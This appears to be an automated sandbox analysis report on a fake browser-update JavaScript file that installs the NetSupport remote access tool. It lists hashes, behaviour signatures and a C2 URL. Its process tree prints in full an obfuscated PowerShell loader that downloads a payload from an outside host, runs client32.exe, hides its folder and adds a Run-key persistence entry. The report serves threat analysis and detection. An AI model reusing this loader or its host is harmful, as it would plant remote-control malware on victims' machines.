Analysis
-
max time kernel
1594s -
max time network
1797s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
09/01/2024, 20:01
Static task
static1
Behavioral task
behavioral1
Sample
Update_browser_17.6436.js
Resource
win10-20231220-en
Behavioral task
behavioral2
Sample
Update_browser_17.6436.js
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
Update_browser_17.6436.js
Resource
win11-20231215-en
General
-
Target
Update_browser_17.6436.js
-
Size
296KB
-
MD5
fd24b53547b889be132aa98a7f193614
-
SHA1
c5331d01d1149e8b5846d076afaa3f60f5458f99
-
SHA256
d8f2134faeed8cf62887aaad8403ab7f29b5cd26cd03b81cb59774442d97fc0e
-
SHA512
54995b6a818f870655cd33b2b4cdf1185cdfbb91ecf6c8217834ec454041039a4defd7c178851ac11bc32d61d08dd92a2a6207ce90071d2d7987019ae9074c79
-
SSDEEP
3072:4OpyDJu8XUtQQSO1T7cbF/nlz3wq2BOOpyDJu8XUtQQSO1T7cbF/nlz3wq2Bp:lcJ6QhO1T7cZd6BvcJ6QhO1T7cZd6Bp
Malware Config
Extracted
https://boxtechcompany.com/data.php?8317
https://boxtechcompany.com/data.php?8317
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 6 4152 wscript.exe 42 3004 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 1 IoCs
pid Process 1152 client32.exe -
Loads dropped DLL 6 IoCs
pid Process 1152 client32.exe 1152 client32.exe 1152 client32.exe 1152 client32.exe 1152 client32.exe 1152 client32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OFFICE = "C:\\Users\\Admin\\AppData\\Roaming\\DIVX192\\client32.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 6 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3004 powershell.exe 3004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3004 powershell.exe Token: SeSecurityPrivilege 1152 client32.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1152 client32.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 4152 wrote to memory of 3004 4152 wscript.exe 95 PID 4152 wrote to memory of 3004 4152 wscript.exe 95 PID 3004 wrote to memory of 1152 3004 powershell.exe 101 PID 3004 wrote to memory of 1152 3004 powershell.exe 101 PID 3004 wrote to memory of 1152 3004 powershell.exe 101
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Update_browser_17.6436.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4152 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $GsgjmxNfEQdrqJYxQSDVvRpGZu='https://boxtechcompany.com/data.php?8317';$zhqeDTwNVYWLwoIAiIUYqEoUvYDrw=(New-Object System.Net.WebClient).DownloadString($GsgjmxNfEQdrqJYxQSDVvRpGZu);$NQevOZpukEtrdJAHxPHwhdLsdAMMVwYh=[System.Convert]::FromBase64String($zhqeDTwNVYWLwoIAiIUYqEoUvYDrw);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $PKPVlIPDbsJXusApGbSNeAO=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $PKPVlIPDbsJXusApGbSNeAO -PathType Container)) { New-Item -Path $PKPVlIPDbsJXusApGbSNeAO -ItemType Directory };$p=Join-Path $PKPVlIPDbsJXusApGbSNeAO 'vib.zip';[System.IO.File]::WriteAllBytes($p,$NQevOZpukEtrdJAHxPHwhdLsdAMMVwYh);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$PKPVlIPDbsJXusApGbSNeAO)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $PKPVlIPDbsJXusApGbSNeAO 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $PKPVlIPDbsJXusApGbSNeAO -Force; $FSDFSSD.attributes='Hidden';$s=$PKPVlIPDbsJXusApGbSNeAO+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Users\Admin\AppData\Roaming\DIVX192\client32.exe"C:\Users\Admin\AppData\Roaming\DIVX192\client32.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1152
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
101KB
MD5c4f1b50e3111d29774f7525039ff7086
SHA157539c95cba0986ec8df0fcdea433e7c71b724c6
SHA25618df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5
-
Filesize
92KB
MD556c7af2760c6979dc064a921e1669358
SHA1e879aecf30241468769e9206fa0d543f31d1be18
SHA256a6f2fefeeb992008a2ff1f6781e4656820b905ec473648b08b8a129fab026438
SHA512f5803eb2fe1f1c7ee9c72baadf9b5911c807bfdc161d4dc5cc6accd8603459bf0bf65bf700f7be3ca6083957c8357340890b32ab392803fcb1be9a56eb64389d